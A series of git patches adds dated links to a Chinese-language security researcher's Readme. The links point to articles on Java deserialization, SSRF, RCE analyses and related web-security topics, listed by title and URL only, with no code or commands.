<63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Apr 2023 13:52:56 +0800 Subject: [PATCH 316/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 20f0e65..8a312d9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -306,3 +306,4 @@ + 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) + 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** + 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) ++ 2023/04/03 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) From a43e1358829651bf2ebb0cf4c5db9a3f9bec5ef8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Apr 2023 17:08:47 +0800 Subject: [PATCH 317/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8a312d9..ee9b659 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -306,4 +306,5 @@ + 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) + 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** + 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) -+ 2023/04/03 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) ++ 2023/04/02 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) ++ 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 2e42e80cbf7c52818c6e849f70ae62818f16fc6d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 12 Apr 2023 21:12:29 +0800 Subject: [PATCH 318/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ee9b659..e4eb71e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -308,3 +308,4 @@ + 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) + 2023/04/02 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) + 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) From b2830fa50e3777a76560e6c14a0a61a502380553 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 15 Apr 2023 18:12:17 +0800 Subject: [PATCH 319/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e4eb71e..86fa42c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -309,3 +309,4 @@ + 2023/04/02 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) + 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) ++ 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** From 090712fbe5fca9150b86a0cfc07ad8a55fcb8074 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 19 Apr 2023 11:24:37 +0800 Subject: [PATCH 320/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 86fa42c..47b3a2d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -310,3 +310,4 @@ + 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) + 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** ++ 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** From 0be06ea19db6c533e2ba5ee67a05652227ce0e20 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 31 May 2023 14:38:54 +0800 Subject: [PATCH 321/332] Create readme.md --- shell/Groovy/readme.md | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 shell/Groovy/readme.md diff --git a/shell/Groovy/readme.md b/shell/Groovy/readme.md new file mode 100644 index 0000000..1f20d18 --- /dev/null +++ b/shell/Groovy/readme.md @@ -0,0 +1,3 @@ +Groovy 安全 + +https://xz.aliyun.com/t/10703 From f2a82c2f327caf4848ba9410eb07b0e49f1661c5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 31 May 2023 15:16:29 +0800 Subject: [PATCH 322/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 47b3a2d..a960fd2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -311,3 +311,4 @@ + 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) + 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** + 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** ++ 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) From ad71815b92bc5c81a674e479e2c35d817c1b96e3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 3 Jun 2023 17:50:33 +0800 Subject: [PATCH 323/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a960fd2..dff0eb0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -312,3 +312,4 @@ + 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** + 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** + 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) ++ 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) From 97f575a8c79e5c7f67afed23bced47ac87a00a64 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 3 Jun 2023 18:00:28 +0800 Subject: [PATCH 324/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dff0eb0..f3df6af 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -313,3 +313,4 @@ + 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** + 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) + 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) ++ 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) From 06320d964a19c67ad06305ce6f51a0b33a72bf1c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 4 Jun 2023 14:16:47 +0800 Subject: [PATCH 325/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f3df6af..71e1c71 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -314,3 +314,4 @@ + 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) + 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) + 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) ++ 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) From 059a82feb5048cc0b23f611230a808caeb08ecb7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Jun 2023 12:58:53 +0800 Subject: [PATCH 326/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 71e1c71..b0489dc 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -315,3 +315,4 @@ + 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) + 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) + 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) ++ 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) From 62ea34e74a7a48e93f66684e295caa1c4210de04 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Jun 2023 22:08:24 +0800 Subject: [PATCH 327/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b0489dc..5352177 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -316,3 +316,4 @@ + 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) + 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) ++ 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) From d481c3578b122a9bb8d7d24a3248889d1078eeef Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 6 Jun 2023 11:38:22 +0800 Subject: [PATCH 328/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 5352177..a075ebe 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -317,3 +317,4 @@ + 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) ++ 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** From f1260ae49ecb1bda1c91811608fef7c3f5e15e2c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Jun 2023 21:25:27 +0800 Subject: [PATCH 329/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a075ebe..b4ac6f6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -318,3 +318,4 @@ + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** ++ 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) From ce6588308a2a340a77849833733c5fe65422f3a5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Jun 2023 21:29:01 +0800 Subject: [PATCH 330/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b4ac6f6..30e3f6b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -318,4 +318,4 @@ + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** -+ 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) ++ 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) [cdn原理分析-本地搭建cdn模拟访问过程](https://mp.weixin.qq.com/s/u-VWrrdlkRzKs7u04EPV-g) From 3d3b9f1907662f851cf7cd698762795d43368502 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Jul 2023 22:34:14 +0800 Subject: [PATCH 331/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 30e3f6b..c6adbcc 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -319,3 +319,4 @@ + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** + 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) [cdn原理分析-本地搭建cdn模拟访问过程](https://mp.weixin.qq.com/s/u-VWrrdlkRzKs7u04EPV-g) ++ 2023/07/02 [一种基于规则的 JavaWeb 回显方案](https://mp.weixin.qq.com/s/hIPz0LEk_OW_IpUbfKBYMg) From f66350052c3674c4c090cb24524b0559af905e33 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 11 Jul 2023 15:47:41 +0800 Subject: [PATCH 332/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c6adbcc..a8914bd 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -320,3 +320,4 @@ + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** + 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) [cdn原理分析-本地搭建cdn模拟访问过程](https://mp.weixin.qq.com/s/u-VWrrdlkRzKs7u04EPV-g) + 2023/07/02 [一种基于规则的 JavaWeb 回显方案](https://mp.weixin.qq.com/s/hIPz0LEk_OW_IpUbfKBYMg) ++ 2023/07/11 [企业微信密钥泄露利用小案例](https://mp.weixin.qq.com/s/mptsykGJHmRC87dYqFFqMw)